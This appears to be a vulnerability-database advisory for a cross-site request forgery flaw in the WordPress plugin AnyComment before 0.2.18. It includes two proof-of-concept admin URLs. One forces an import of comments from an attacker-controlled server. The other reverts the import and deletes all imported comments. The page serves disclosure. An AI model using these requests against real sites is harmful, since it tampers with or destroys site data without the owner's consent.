Lucene search

K

AnyComment < 0.2.18 - Arbitrary HyperComments Import/Revert via CSRF

🗓️ 19 Jan 2022 00:00:00Reported by Brandon RoldanType 
wpexploit
 wpexploit
👁 110 Views

Arbitrary HyperComments Import/Revert CSRF on AnyComment < 0.2.18

Show more
Related
Code
Go to https://example.com/wordpress/wp-admin/admin.php?r=import%2Fhypercomments&url=http://<your_server>, and you will see a get request in your server logs indicating that the import request is done. 

To revert the imports (ie delete all imported comments): https://example.com/wp-admin/admin.php?r=import%2Fhypercomments&revert=1

https://www.youtube.com/watch?v=75BH2m8cmPo

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
19 Jan 2022 00:00Current
1.4Low risk
Vulners AI Score1.4
EPSS0.002
110
.json
Report